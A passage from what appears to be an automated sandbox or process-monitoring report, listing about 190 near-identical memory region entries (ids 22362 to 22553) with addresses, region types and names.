"" Region: id = 22362 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22363 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22364 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22365 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22366 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22367 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22368 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22369 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22370 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22371 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22372 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22373 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22374 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22375 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22376 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22377 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22378 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22379 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22380 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22381 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22382 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22383 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22384 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22385 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22386 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22387 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22388 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22389 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22390 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22391 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22392 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22393 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22394 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22395 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22396 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22397 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22398 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22399 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22400 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22401 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22402 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22403 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22404 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22405 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22406 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22407 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22408 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22409 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22410 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22411 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22412 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22413 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22414 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22415 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22416 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22417 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22418 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22419 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22420 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22421 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22422 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22423 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22424 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22425 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22426 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22427 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22428 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22429 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22430 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22431 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22432 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22433 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22434 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22435 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22436 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22437 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22438 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22439 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22440 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22441 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22442 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22443 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22444 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22445 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22446 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22447 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22448 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22449 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22450 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22451 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22452 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22453 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22454 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22455 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22456 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22457 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22458 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22459 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22460 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22461 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22462 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22463 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22464 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22465 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22466 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22467 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22468 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22469 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22470 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22471 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22472 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22473 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22474 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22475 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22476 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22477 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22478 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22479 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22480 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22481 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22482 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22483 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22484 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22485 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22486 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22487 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22488 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22489 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22490 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22491 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22492 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22493 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22494 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22495 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22496 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22497 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22498 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22499 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22500 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22501 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22502 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22503 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22504 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22505 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22506 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22507 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22508 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22509 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22510 start_va = 0x26d0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 22511 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22512 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22513 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22514 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22515 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22516 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22517 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22518 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22519 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22520 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22521 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22522 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22523 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22524 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22525 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22526 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22527 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22528 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22529 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22530 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22531 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22532 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22533 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22534 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22535 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22536 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22537 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22538 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22539 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22540 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22541 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22542 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22543 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22544 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22545 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22546 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22547 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22548 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22549 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22550 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22551 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22552 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22553 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 